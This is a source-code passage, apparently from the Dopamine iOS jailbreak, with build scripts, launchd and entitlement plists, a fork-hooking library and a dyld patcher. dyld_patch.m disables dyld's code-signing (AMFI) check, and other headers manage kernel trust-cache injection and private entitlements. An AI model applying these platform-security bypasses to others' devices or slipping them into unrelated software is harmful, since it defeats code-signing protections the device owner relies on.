libjailbreak 15 | cd "libjailbreak" 16 | make clean 17 | cd - 18 | 19 | # jailbreakd 20 | cd "jailbreakd" 21 | make clean 22 | cd - 23 | 24 | # jailbreakd 25 | cd "idownloadd" 26 | make clean 27 | cd - 28 | 29 | # boomerang 30 | cd "boomerang" 31 | make clean 
32 | cd - 33 | 34 | # jbinit 35 | cd "jbinit" 36 | make clean 37 | cd - 38 | 39 | # jbctl 40 | cd "jbctl" 41 | make clean 42 | cd - 43 | 44 | # launchdhook 45 | cd "launchdhook" 46 | make clean 47 | cd - 48 | 49 | # systemhook 50 | cd "systemhook" 51 | make clean 52 | cd - 53 | 54 | # watchdoghook 55 | cd "watchdoghook" 56 | make clean 57 | cd - 58 | 59 | # roothidehooks 60 | cd "roothidehooks" 61 | make clean 62 | cd - 63 | 64 | # forkfix 65 | cd "forkfix" 66 | make clean 67 | cd - 68 | 69 | cd "$PREV_DIR"
--------------------------------------------------------------------------------
/BaseBin/clean.sh:
--------------------------------------------------------------------------------
#!/bin/sh
# Runs `make clean` in every BaseBin component directory, then returns to the
# directory the script was started from.

set -e

PREV_DIR=$(pwd)
PACK_DIR=$(dirname -- "$0")
cd "$PACK_DIR"

# Components are visited in a fixed order. `cd -` steps back to the BaseBin
# directory after each one (and prints it); `set -e` stops the run at the
# first component whose `make clean` fails.
for component in \
    libfilecom \
    libjailbreak \
    jailbreakd \
    idownloadd \
    boomerang \
    jbinit \
    jbctl \
    launchdhook \
    systemhook \
    watchdoghook \
    roothidehooks \
    forkfix
do
    cd "$component"
    make clean
    cd -
done

cd "$PREV_DIR"
--------------------------------------------------------------------------------
/BaseBin/forkfix/Makefile:
--------------------------------------------------------------------------------
1 | TARGET = forkfix.dylib 2 | CC = clang 3 | 4 | CFLAGS = -Werror -dynamiclib -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path)
-arch arm64e -miphoneos-version-min=15.0 -O2 5 | 6 | sign: $(TARGET) 7 | @ldid -S $^ 8 | 9 | $(TARGET): $(wildcard src/*.c src/*.S) 10 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 11 | 12 | clean: 13 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/forkfix/src/litehook.c: -------------------------------------------------------------------------------- 1 | #include "litehook.h" 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | static uint64_t __attribute((naked)) __xpaci(uint64_t a) 16 | { 17 | asm(".long 0xDAC143E0"); // XPACI X0 18 | asm("ret"); 19 | } 20 | 21 | uint64_t xpaci(uint64_t a) 22 | { 23 | // If a looks like a non-pac'd pointer just return it 24 | if ((a & 0xFFFFFF0000000000) == 0xFFFFFF0000000000) { 25 | return a; 26 | } 27 | return __xpaci(a); 28 | } 29 | 30 | uint32_t movk(uint8_t x, uint16_t val, uint16_t lsl) 31 | { 32 | uint32_t base = 0b11110010100000000000000000000000; 33 | 34 | uint32_t hw = 0; 35 | if (lsl == 16) { 36 | hw = 0b01 << 21; 37 | } 38 | else if (lsl == 32) { 39 | hw = 0b10 << 21; 40 | } 41 | else if (lsl == 48) { 42 | hw = 0b11 << 21; 43 | } 44 | 45 | uint32_t imm16 = (uint32_t)val << 5; 46 | uint32_t rd = x & 0x1F; 47 | 48 | return base | hw | imm16 | rd; 49 | } 50 | 51 | uint32_t br(uint8_t x) 52 | { 53 | uint32_t base = 0b11010110000111110000000000000000; 54 | uint32_t rn = ((uint32_t)x & 0x1F) << 5; 55 | return base | rn; 56 | } 57 | 58 | __attribute__((noinline, naked)) volatile kern_return_t litehook_vm_protect(mach_port_name_t target, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection) 59 | { 60 | __asm("mov x16, #0xFFFFFFFFFFFFFFF2"); 61 | __asm("svc 0x80"); 62 | __asm("ret"); 63 | } 64 | 65 | kern_return_t litehook_unprotect(vm_address_t addr, vm_size_t size) 66 | { 67 | return 
litehook_vm_protect(mach_task_self(), addr, size, false, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY); 68 | } 69 | 70 | kern_return_t litehook_protect(vm_address_t addr, vm_size_t size) 71 | { 72 | return litehook_vm_protect(mach_task_self(), addr, size, false, VM_PROT_READ | VM_PROT_EXECUTE); 73 | } 74 | 75 | kern_return_t litehook_hook_function(void *source, void *target) 76 | { 77 | kern_return_t kr = KERN_SUCCESS; 78 | 79 | uint32_t *toHook = (uint32_t*)xpaci((uint64_t)source); 80 | uint64_t target64 = (uint64_t)xpaci((uint64_t)target); 81 | 82 | kr = litehook_unprotect((vm_address_t)toHook, 5*4); 83 | if (kr != KERN_SUCCESS) return kr; 84 | 85 | toHook[0] = movk(16, target64 >> 0, 0); 86 | toHook[1] = movk(16, target64 >> 16, 16); 87 | toHook[2] = movk(16, target64 >> 32, 32); 88 | toHook[3] = movk(16, target64 >> 48, 48); 89 | toHook[4] = br(16); 90 | uint32_t hookSize = 5 * sizeof(uint32_t); 91 | 92 | kr = litehook_protect((vm_address_t)toHook, hookSize); 93 | if (kr != KERN_SUCCESS) return kr; 94 | 95 | sys_icache_invalidate(toHook, hookSize); 96 | 97 | return KERN_SUCCESS; 98 | } 99 | -------------------------------------------------------------------------------- /BaseBin/forkfix/src/litehook.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | kern_return_t litehook_hook_function(void *source, void *target); -------------------------------------------------------------------------------- /BaseBin/forkfix/src/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "syscall.h" 9 | #include "litehook.h" 10 | 11 | int64_t (*jbdswForkFix)(pid_t childPid); 12 | 13 | extern void _malloc_fork_prepare(void); 14 | extern void _malloc_fork_parent(void); 15 | extern void xpc_atfork_prepare(void); 16 | extern void xpc_atfork_parent(void); 17 | extern void 
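dispatch_atfork_prepare(void);
extern void dispatch_atfork_parent(void);
extern void __fork(void);

// Pipe pair used to hand-shake between parent and child around the fixup.
// Index 0 is the read end and index 1 the write end, as filled in by pipe().
int childToParentPipe[2];
int parentToChildPipe[2];

// Create both pipes before forking; abort if either cannot be created.
static void openPipes(void)
{
	if (pipe(parentToChildPipe) < 0 || pipe(childToParentPipe) < 0) {
		abort();
	}
}

// Close all four pipe ends through the raw ffsys_close wrapper; abort if any close fails.
static void closePipes(void)
{
	if (ffsys_close(parentToChildPipe[0]) != 0 || ffsys_close(parentToChildPipe[1]) != 0 || ffsys_close(childToParentPipe[0]) != 0 || ffsys_close(childToParentPipe[1]) != 0) {
		abort();
	}
}

// Child side of the handshake: announce readiness, then block until the parent
// reports that the fixup is done. Only the raw ffsys_* wrappers are used here.
// NOTE(review): the return values of ffsys_write/ffsys_read are not checked, so a
// failed read lets the child continue without the fixup having been confirmed.
void child_fixup(void)
{
	// Tell parent we are waiting for fixup now
	char msg = ' ';
	ffsys_write(childToParentPipe[1], &msg, sizeof(msg));

	// Wait until parent completes fixup
	ffsys_read(parentToChildPipe[0], &msg, sizeof(msg));
}

// Parent side of the handshake: wait for the child, apply the fixup through
// jbdswForkFix, then release the child.
//
// childPid: pid returned by ffsys_fork() for the new child.
//
// If the fixup cannot be applied (the entry point was not resolved, or it
// returned non-zero) the child is killed and the parent aborts.
void parent_fixup(pid_t childPid)
{
	// Reenable some system functionality that XPC is dependent on and XPC itself
	// (Normally unavailable during __fork)
	_malloc_fork_parent();
	dispatch_atfork_parent();
	xpc_atfork_parent();

	// Wait until the child is ready and waiting
	// NOTE(review): the result of read() is not checked; an interrupted read
	// would let the fixup run before the child has signalled readiness.
	char msg = ' ';
	read(childToParentPipe[0], &msg, sizeof(msg));

	// Child is waiting for wx_allowed + permission fixups now
	// Apply fixup
	// jbdswForkFix is looked up with dlsym() in the constructor and that result
	// is never checked, so it can be NULL here. Calling it unchecked would crash
	// the parent and leave the child blocked in its read forever; treat a missing
	// entry point like a failed fixup instead.
	int64_t fix_ret = (jbdswForkFix != NULL) ? jbdswForkFix(childPid) : -1;
	if (fix_ret != 0) {
		kill(childPid, SIGKILL);
		abort();
	}

	// Tell child we are done, this will make it resume
	write(parentToChildPipe[1], &msg, sizeof(msg));

	// Disable system functionality related to XPC again
	_malloc_fork_prepare();
	dispatch_atfork_prepare();
	xpc_atfork_prepare();
}

// Replacement for __fork (installed by the constructor via litehook_hook_function):
// forks through the raw syscall wrapper and runs the parent/child handshake.
__attribute__((visibility ("default"))) pid_t forkfix___fork(void)
{
	openPipes();

	pid_t pid = ffsys_fork();
	if (pid < 0) {
		closePipes();
		return pid;
	}

	if (pid == 0) {
		child_fixup();
	}
	else {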
parent_fixup(pid); 90 | } 91 | 92 | closePipes(); 93 | return pid; 94 | } 95 | 96 | __attribute__((constructor)) static void initializer(void) 97 | { 98 | jbdswForkFix = dlsym(RTLD_DEFAULT, "jbdswForkFix"); 99 | litehook_hook_function((void *)&__fork, (void *)&forkfix___fork); 100 | } -------------------------------------------------------------------------------- /BaseBin/forkfix/src/syscall.S: -------------------------------------------------------------------------------- 1 | .text 2 | 3 | .align 4 4 | 5 | .global _ffsys_fork 6 | _ffsys_fork: 7 | pacibsp 8 | stp x29, x30, [SP, #-0x10]! 9 | mov x29, sp 10 | mov x16, #2 11 | svc 0x80 12 | b.cs _ffsys_fork_err 13 | cbz x1, _ffsys_fork_end 14 | mov w0, #0 15 | adrp x9, __current_pid@GOTPAGE 16 | ldr x9, [x9, __current_pid@GOTPAGEOFF] 17 | str w0, [x9] 18 | b _ffsys_fork_end 19 | 20 | _ffsys_fork_err: 21 | bl _cerror 22 | mov w0, #-1 23 | 24 | _ffsys_fork_end: 25 | mov sp, x29 26 | ldp x29, x30, [SP],#0x10 27 | retab 28 | 29 | .global _ffsys_vm_protect 30 | _ffsys_vm_protect: 31 | mov x16, #-14 32 | svc 0x80 33 | ret 34 | 35 | .global _ffsys_getpid 36 | _ffsys_getpid: 37 | mov x16, #20 38 | svc 0x80 39 | ret 40 | 41 | .global _ffsys_pid_suspend 42 | _ffsys_pid_suspend: 43 | mov x16, #433 44 | svc 0x80 45 | ret 46 | 47 | .global _ffsys_read 48 | _ffsys_read: 49 | mov x16, #3 50 | svc 0x80 51 | ret 52 | 53 | .global _ffsys_write 54 | _ffsys_write: 55 | mov x16, #4 56 | svc 0x80 57 | ret 58 | 59 | .global _ffsys_close 60 | _ffsys_close: 61 | mov x16, #6 62 | svc 0x80 63 | ret 64 | -------------------------------------------------------------------------------- /BaseBin/forkfix/src/syscall.h: -------------------------------------------------------------------------------- 1 | kern_return_t ffsys_vm_protect(vm_map_t target_task, vm_address_t address, vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); 2 | pid_t ffsys_fork(void); 3 | pid_t ffsys_getpid(void); 4 | int ffsys_pid_suspend(pid_t pid); 5 | 6 | 
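ssize_t ffsys_read(int fildes, void *buf, size_t nbyte);
ssize_t ffsys_write(int fildes, const void *buf, size_t nbyte);
int ffsys_close(int fildes);

--------------------------------------------------------------------------------
/BaseBin/forkfix/upload.sh:
--------------------------------------------------------------------------------
# Build forkfix.dylib and copy it to the device, replacing the installed copy.
# Stops at the first failing command.
set -e

PROJECT_NAME=forkfix.dylib
# NOTE(review): root login on localhost:2222, presumably a locally forwarded SSH port to a test device - confirm.
DEVICE=root@localhost
PORT=2222

make
# Every expansion is quoted so a value containing spaces or glob characters
# cannot widen what the remote "rm -rf" or the copy operates on.
ssh "$DEVICE" -p "$PORT" "rm -rf '/var/jb/usr/lib/$PROJECT_NAME'"
scp -P"$PORT" "./$PROJECT_NAME" "$DEVICE:/var/jb/usr/lib/$PROJECT_NAME"

--------------------------------------------------------------------------------
/BaseBin/idownloadd/Makefile:
--------------------------------------------------------------------------------
XCODE_PROJECT = src/idownloadd.xcodeproj
XCODE_SCHEME = idownloadd
CS_FLAGS = CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO CODE_SIGNING_ALLOWED=NO
CONFIGURATION = Release

OUTPUT_NAME = idownloadd

build:
	xcodebuild -archivePath ./.build -project $(XCODE_PROJECT) -scheme $(XCODE_SCHEME) -configuration $(CONFIGURATION) -destination generic/platform=iOS archive $(CS_FLAGS)
	@cp -f ./.build.xcarchive/Products/usr/local/bin/$(OUTPUT_NAME) .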
11 | @rm -rf ./.build.xcarchive 12 | @ldid -Sentitlements.plist $(OUTPUT_NAME) 13 | 14 | clean: 15 | xcodebuild -project $(XCODE_PROJECT) -scheme $(XCODE_SCHEME) -configuration $(CONFIGURATION) -destination generic/platform=iOS clean 16 | @rm -f $(OUTPUT_NAME) 17 | 18 | default: build -------------------------------------------------------------------------------- /BaseBin/idownloadd/daemon.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | com.opa334.idownloadd 7 | ProgramArguments 8 | 9 | basebin/idownloadd 10 | 11 | UserName 12 | root 13 | RunAtLoad 14 | 15 | KeepAlive 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | com.apple.private.security.no-container 8 | 9 | com.apple.private.security.storage.AppBundles 10 | 11 | com.apple.private.security.storage.AppDataContainers 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "pins" : [ 3 | { 4 | 
"identity" : "idownload", 5 | "kind" : "remoteSourceControl", 6 | "location" : "https://github.com/pinauten/iDownload", 7 | "state" : { 8 | "branch" : "master", 9 | "revision" : "62920e864f06af4b0a50a0aa9b6e0a7c7bd83a6f" 10 | } 11 | }, 12 | { 13 | "identity" : "swiftutils", 14 | "kind" : "remoteSourceControl", 15 | "location" : "https://github.com/pinauten/SwiftUtils", 16 | "state" : { 17 | "branch" : "master", 18 | "revision" : "1d37faabb4c58b3152394c9b6e1c1a68507646b9" 19 | } 20 | } 21 | ], 22 | "version" : 2 23 | } 24 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd/iDownloadCmds.swift: -------------------------------------------------------------------------------- 1 | // 2 | // iDownloadCMDs.swift 3 | // idownloadd 4 | // 5 | // Created by Lars Fröder on 08.06.23. 6 | // 7 | 8 | import Foundation 9 | import iDownload 10 | 11 | let iDownloadCmds = [ 12 | "help": iDownload_help 13 | ] as [String: iDownloadCmd] 14 | 15 | func iDownload_help(_ hndlr: iDownloadHandler, _ cmd: String, _ args: [String]) throws { 16 | try hndlr.sendline("") 17 | } 18 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd/idownloadd-Bridging-Header.h: -------------------------------------------------------------------------------- 1 | // 2 | // idownloadd-Bridging-Header.h 3 | // idownloadd 4 | // 5 | // Created by Lars Fröder on 08.06.23. 6 | // 7 | 8 | #ifndef idownloadd_Bridging_Header_h 9 | #define idownloadd_Bridging_Header_h 10 | 11 | #import 12 | 13 | #import 14 | #import 15 | #import 16 | 17 | #endif /* idownloadd_Bridging_Header_h */ 18 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd/main.swift: -------------------------------------------------------------------------------- 1 | // 2 | // main.swift 3 | // idownloadd 4 | // 5 | // Created by Lars Fröder on 08.06.23. 
6 | // 7 | 8 | import Foundation 9 | import iDownload 10 | 11 | jbdInitPPLRW(); 12 | 13 | do { 14 | try iDownload.launch_iDownload(krw: iDownloadKRW(), otherCmds: iDownloadCmds) 15 | } catch let e { 16 | NSLog("Failed to launch iDownload: \(e)") 17 | exit(1) 18 | } 19 | 20 | RunLoop.main.run() 21 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = jailbreakd 2 | 3 | CC = clang 4 | 5 | CFLAGS = -Werror -Wno-availability -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -Wno-nullability-completeness-on-arrays -O3 6 | LDFLAGS = -L../libjailbreak -ljailbreak -lbsm -larchive 7 | 8 | sign: $(TARGET) 9 | @ldid -Sentitlements.plist $< 10 | 11 | $(TARGET): $(wildcard src/*.m src/*.S src/machoparse/*.c) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | 14 | clean: 15 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/jailbreakd/README.md: -------------------------------------------------------------------------------- 1 | # Dopamine Base Binaries 2 | 3 | ## jailbreakd 4 | 5 | ### Supported 6 | 7 | 8 | Dopamine -> jailbreakd: 9 | - XPC call to jailbreakd, make it create a thread and return it -------------------------------------------------------------------------------- /BaseBin/jailbreakd/daemon.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ProcessType 6 | Interactive 7 | Label 8 | com.opa334.jailbreakd 9 | MachServices 10 | 11 | com.opa334.jailbreakd 12 | 13 | HostSpecialPort 14 | 16 15 | 16 | com.opa334.jailbreakd.systemwide-%JBRAND% 17 | 18 | 19 | ProgramArguments 20 | 21 | basebin/jailbreakd 22 | 23 | UserName 24 | root 25 | RunAtLoad 26 | 27 | KeepAlive 28 | 
29 | 30 | 31 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | task_for_pid-allow 8 | 9 | com.apple.system-task-ports 10 | 11 | com.apple.system-task-ports.control 12 | 13 | com.apple.private.security.no-container 14 | 15 | com.apple.private.amfi.can-check-trust-cache 16 | 17 | com.apple.security.exception.iokit-user-client-class 18 | 19 | AppleMobileFileIntegrityUserClient 20 | 21 | com.apple.private.bindfs-allow 22 | 23 | com.apple.private.coreservices.canmaplsdatabase 24 | 25 | com.apple.private.security.storage.AppBundles 26 | 27 | com.apple.private.security.storage.AppDataContainers 28 | 29 | com.apple.private.xpc.launchd.userspace-reboot 30 | 31 | com.apple.springboard.CFUserNotification 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/JBDTCPage.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | #import "trustcache_structs.h" 4 | 5 | // 742 cdhashes fit into one page 6 | #define TC_ENTRY_COUNT_PER_PAGE 742 7 | 8 | @class JBDTCPage; 9 | 10 | extern NSMutableArray *gTCPages; 11 | extern NSMutableArray *gTCUnusedAllocations; 12 | BOOL tcPagesRecover(void); 13 | void tcPagesChanged(void); 14 | 15 | 16 | @interface JBDTCPage : NSObject 17 | { 18 | trustcache_page* _page; 19 | } 20 | 21 | @property (nonatomic) uint64_t kaddr; 22 | 23 | - (instancetype)initWithKernelAddress:(uint64_t)kaddr; 24 | - (instancetype)initAllocateAndLink; 25 | 26 | - (void)sort; 27 | - (uint32_t)amountOfSlotsLeft; 28 | - (BOOL)addEntry:(trustcache_entry)entry; 29 | - (BOOL)removeEntry:(trustcache_entry)entry; 30 | 31 | - (void)unlinkAndFree; 32 | 33 | @end 34 | -------------------------------------------------------------------------------- 
/BaseBin/jailbreakd/src/codesign.h: -------------------------------------------------------------------------------- 1 | #import 2 | int resignFile(NSString *filePath, bool preserveMetadata); -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/dyld_patch.h: -------------------------------------------------------------------------------- 1 | #import 2 | int applyDyldPatches(NSString *dyldPath); -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/dyld_patch.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import "codesign.h" 3 | #import 4 | #import 5 | 6 | int applyDyldPatches(NSString *dyldPath) 7 | { 8 | // Find offsets by abusing CoreSymbolication APIs 9 | void *csHandle = dlopen("/System/Library/PrivateFrameworks/CoreSymbolication.framework/CoreSymbolication", RTLD_NOW); 10 | CSSymbolicatorRef (*__CSSymbolicatorCreateWithPathAndArchitecture)(const char* path, cpu_type_t type) = dlsym(csHandle, "CSSymbolicatorCreateWithPathAndArchitecture"); 11 | CSSymbolRef (*__CSSymbolicatorGetSymbolWithMangledNameAtTime)(CSSymbolicatorRef cs, const char* name, uint64_t time) = dlsym(csHandle, "CSSymbolicatorGetSymbolWithMangledNameAtTime"); 12 | CSRange (*__CSSymbolGetRange)(CSSymbolRef sym) = dlsym(csHandle, "CSSymbolGetRange"); 13 | //void (*__CSRelease)(CSTypeRef ptr) = dlsym(csHandle, "CSRelease"); 14 | 15 | CSSymbolicatorRef symbolicator = __CSSymbolicatorCreateWithPathAndArchitecture("/usr/lib/dyld", CPU_TYPE_ARM64); 16 | CSSymbolRef symbol = __CSSymbolicatorGetSymbolWithMangledNameAtTime(symbolicator, "__ZN5dyld413ProcessConfig8Security7getAMFIERKNS0_7ProcessERNS_15SyscallDelegateE", 0); 17 | CSRange range = __CSSymbolGetRange(symbol); 18 | //__CSRelease(symbolicator); 19 | //__CSRelease(symbol); 20 | uint64_t getAMFIOffset = range.location; 21 | if (getAMFIOffset == 0) { 22 | return 100; 23 | } 24 | 25 | FILE 
*dyldFile = fopen(dyldPath.fileSystemRepresentation, "rb+"); 26 | if (!dyldFile) return 101; 27 | fseek(dyldFile, getAMFIOffset, SEEK_SET); 28 | uint32_t patchInstr[2] = { 29 | 0xD2801BE0, // mov x0, 0xDF 30 | 0xD65F03C0 // ret 31 | }; 32 | fwrite(patchInstr, sizeof(patchInstr), 1, dyldFile); 33 | fclose(dyldFile); 34 | JBLogDebug("patched dyld"); 35 | 36 | int csRet = resignFile(dyldPath, true); 37 | if (csRet != 0) { 38 | return csRet; 39 | } 40 | JBLogDebug("resigned dyld"); 41 | 42 | return 0; 43 | } -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/fakelib.h: -------------------------------------------------------------------------------- 1 | int setFakeLibVisible(bool visible); 2 | int makeFakeLib(void); 3 | bool isFakeLibBindMountActive(void); 4 | int setFakeLibBindMountActive(bool active); -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/forkfix.h: -------------------------------------------------------------------------------- 1 | int64_t apply_fork_fixup(pid_t parentPid, pid_t childPid); -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/server.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | extern NSDictionary* gBootInfo; 4 | uint64_t bootInfo_getUInt64(NSString* name); 5 | uint64_t bootInfo_getSlidUInt64(NSString* name); 6 | NSData* bootInfo_getData(NSString* name); 7 | 8 | extern uint64_t gSelfProc; 9 | extern uint64_t gSelfTask; 10 | 11 | void primitivesInitializedCallback(void); -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/spawn_wrapper.h: -------------------------------------------------------------------------------- 1 | #import 2 | int spawn(NSString* path, NSArray* args); -------------------------------------------------------------------------------- 
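/BaseBin/jailbreakd/src/spawn_wrapper.m:
--------------------------------------------------------------------------------
#import
#import
#import "spawn_wrapper.h"
#import
extern char **environ;

/*
 * Run the executable at `path` with `args` and wait for it to finish.
 *
 * path: executable to start; it is also passed as argv[0].
 * args: further arguments (may be nil). Elements are converted with -UTF8String,
 *       so they are assumed to be NSString - TODO confirm against callers.
 *
 * Returns:
 *   - the child's exit status when it exited normally,
 *   - 128 + signal number when it was terminated by a signal,
 *   - the posix_spawn() error code when the child could not be started,
 *   - -200 when the argument vector could not be built,
 *   - -222 when waitpid() failed.
 */
int spawn(NSString* path, NSArray* args)
{
	NSMutableArray* argsM = args.mutableCopy ?: [NSMutableArray new];
	[argsM insertObject:path atIndex:0];

	NSUInteger argCount = [argsM count];
	// calloc so that every slot not yet filled is NULL and can be passed to free()
	char **argsC = (char **)calloc(argCount + 1, sizeof(char*));
	if (!argsC) return -200;

	// A NULL slot in the middle of argv would silently cut off the remaining
	// arguments, so a failed conversion or strdup stops the spawn instead.
	BOOL argsBuilt = YES;
	for (NSUInteger i = 0; i < argCount; i++)
	{
		const char *arg = [[argsM objectAtIndex:i] UTF8String];
		argsC[i] = arg ? strdup(arg) : NULL;
		if (!argsC[i]) {
			argsBuilt = NO;
			break;
		}
	}
	argsC[argCount] = NULL;

	pid_t task_pid;
	int status = -200;
	int spawnError = -200;
	if (argsBuilt) {
		spawnError = posix_spawn(&task_pid, path.fileSystemRepresentation, NULL, NULL, (char *const *)argsC, environ);
	}
	for (NSUInteger i = 0; i < argCount; i++)
	{
		free(argsC[i]);
	}
	free(argsC);
	if (spawnError != 0) return spawnError;
	do
	{
		if (waitpid(task_pid, &status, 0) != -1) {
			JBLogDebug("Child status %d", WEXITSTATUS(status));
		} else
		{
			perror("waitpid");
			return -222;
		}
	} while (!WIFEXITED(status) && !WIFSIGNALED(status));

	// WEXITSTATUS is only meaningful after a normal exit. Reporting it for a
	// signalled child would typically yield 0, so a helper that crashed would
	// look like one that succeeded.
	if (WIFSIGNALED(status)) return 128 + WTERMSIG(status);

	return WEXITSTATUS(status);
}
--------------------------------------------------------------------------------
/BaseBin/jailbreakd/src/trustcache.h:
--------------------------------------------------------------------------------
#import "trustcache_structs.h"
#import

void dynamicTrustCacheAddEntry(trustcache_entry entry);
void dynamicTrustCacheRemoveEntry(trustcache_entry entry);
void fileEnumerateTrustCacheEntries(NSURL *fileURL, void (^enumerateBlock)(trustcache_entry entry));
void dynamicTrustCacheUploadFile(NSURL *fileURL);
void dynamicTrustCacheUploadCDHashFromData(NSData *cdHash);
void dynamicTrustCacheUploadCDHashesFromArray(NSArray *cdHashArray);
void dynamicTrustCacheUploadDirectory(NSString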
*directoryPath); 11 | void rebuildDynamicTrustCache(void); 12 | 13 | BOOL trustCacheListAdd(uint64_t trustCacheKaddr); 14 | BOOL trustCacheListRemove(uint64_t trustCacheKaddr); 15 | uint64_t staticTrustCacheUploadFile(trustcache_file *fileToUpload, size_t fileSize, size_t *outMapSize); 16 | uint64_t staticTrustCacheUploadCDHashesFromArray(NSArray *cdHashArray, size_t *outMapSize);; 17 | uint64_t staticTrustCacheUploadFileAtPath(NSString *filePath, size_t *outMapSize); 18 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/trustcache_structs.h: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | 5 | typedef struct sTrustcache_entry 6 | { 7 | uint8_t hash[CS_CDHASH_LEN]; 8 | uint8_t hash_type; 9 | uint8_t flags; 10 | } __attribute__((__packed__)) trustcache_entry; 11 | 12 | typedef struct sTrustcache_file 13 | { 14 | uint32_t version; 15 | uuid_t uuid; 16 | uint32_t length; 17 | trustcache_entry entries[]; 18 | } __attribute__((__packed__)) trustcache_file; 19 | 20 | typedef struct sTrustcache_page 21 | { 22 | uint64_t nextPtr; 23 | uint64_t selfPtr; 24 | trustcache_file file; 25 | } __attribute__((__packed__)) trustcache_page; 26 | 27 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/update.h: -------------------------------------------------------------------------------- 1 | #import 2 | NSString *trollStoreRootHelperPath(void); 3 | int basebinUpdateFromTar(NSString *basebinPath, bool rebootWhenDone); 4 | int jbUpdateFromTIPA(NSString *tipaPath, bool rebootWhenDone); -------------------------------------------------------------------------------- /BaseBin/jbctl/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = jbctl 2 | 3 | CC = clang 4 | 5 | CFLAGS = -Werror -framework Foundation -framework CoreServices -framework Security 
-I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc 6 | LDFLAGS = -L../libjailbreak -ljailbreak 7 | 8 | sign: $(TARGET) 9 | @ldid -Sentitlements.plist $< 10 | 11 | $(TARGET): $(wildcard src/*.m) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | 14 | clean: 15 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/jbctl/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | task_for_pid-allow 8 | 9 | com.apple.private.security.no-container 10 | 11 | com.apple.security.exception.mach-lookup.global-name 12 | 13 | com.opa334.jailbreakd 14 | 15 | com.apple.private.xpc.launchd.userspace-reboot 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /BaseBin/jbctl/rebuild_daemon.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ProcessType 6 | Interactive 7 | Label 8 | com.opa334.trustcache_rebuild 9 | ProgramArguments 10 | 11 | basebin/jbctl 12 | rebuild_trustcache 13 | 14 | RunAtLoad 15 | 16 | StartCalendarInterval 17 | 18 | Hour 19 | 0 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /BaseBin/jbinit/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = jbinit 2 | 3 | CC = clang 4 | 5 | CFLAGS = -Werror -framework Foundation -I../_shared -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 6 | LDFLAGS = -L../libjailbreak -ljailbreak 7 | 8 | sign: $(TARGET) 9 | @ldid -Sentitlements.plist -Icom.apple.jbinit $< 10 | 11 | $(TARGET): $(wildcard src/*.m) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | 14 | clean: 15 | @rm -f $(TARGET) 